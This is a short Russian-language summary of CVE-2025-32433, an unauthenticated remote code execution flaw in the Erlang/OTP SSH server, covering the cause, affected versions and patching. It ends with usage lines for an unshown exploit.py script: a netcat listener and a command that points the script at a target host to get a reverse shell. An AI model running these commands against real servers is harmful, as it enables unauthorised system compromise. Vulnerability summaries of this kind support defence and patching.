
CVE-2025-32433: сводка и обзор атак
Краткое описание и обзор атаки CVE-2025-32433
CVE-2025-32433 — это критическая уязвимость удаленного выполнения кода (RCE) без аутентификации в SSH-сервере Erlang/OTP, раскрытая 16 апреля 2025 года. Erlang/OTP SSH — это библиотека, используемая в различных распределенных и телекоммуникационных приложениях. Ошибка возникает из-за неправильной обработки сообщений протокола SSH: сервер не соблюдает нормальную последовательность аутентификации, что позволяет злоумышленнику отправлять специально сформированные SSH-сообщения до прохождения аутентификации. Таким образом, атакующий может внедрить и выполнить произвольный код Erlang на сервере nvd.nist.gov offsec.com . На практике это означает, что злоумышленник, имеющий сетевой доступ к уязвимому SSH-серверу Erlang/OTP (часто работающему от root), может инициировать обратную оболочку или выполнять команды без каких-либо учетных данных, что приводит к полной компрометации системы nvd.nist.gov offsec.com . Данной уязвимости присвоен рейтинг CVSS 10.0 (максимальная критичность) offsec.com .
Уязвимые версии — все релизы Erlang/OTP ниже OTP-27.3.3, OTP-26.2.5.11 или OTP-25.3.2.20 (исправленные версии) nvd.nist.gov offsec.com . В зоне риска часто находятся Linux-серверы или устройства, запускающие SSH-демон на основе Erlang (не путать с OpenSSH). Важно: стандартные серверы OpenSSH на Linux/BSD не уязвимы offsec.com . Пользователям следует предполагать, что любой открытый SSH-сервер Erlang/OTP затронут, и немедленно установить официальные исправления или отключить службу SSH.
Атака работает следующим образом: инициируется SSH-соединение, после чего вне очереди отправляется последовательность SSH-сообщений. :
использование:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
пример:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555